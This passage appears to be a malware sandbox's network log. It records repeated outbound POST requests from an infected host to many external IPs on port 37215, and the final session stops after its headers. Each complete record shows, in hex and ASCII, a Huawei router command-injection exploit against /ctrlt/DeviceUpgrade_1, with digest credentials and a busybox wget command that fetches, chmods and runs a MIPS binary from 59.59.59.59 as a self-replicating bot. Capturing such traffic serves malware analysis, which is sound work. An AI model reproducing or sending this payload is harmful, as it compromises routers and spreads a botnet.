                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1296192.168.2.1548458100.9.65.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810841084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1297192.168.2.1534106157.105.99.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.810874939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1298192.168.2.1555086157.1.75.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811028957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1299192.168.2.1543732197.43.75.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811078072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1300192.168.2.156076641.41.70.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811108112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1301192.168.2.1538854157.138.158.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811223984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1302192.168.2.1556370157.0.204.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811242104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1303192.168.2.1554516197.224.16.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811296940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1304192.168.2.1534860157.225.25.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811331987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1305192.168.2.155086869.155.7.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:02.811372995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
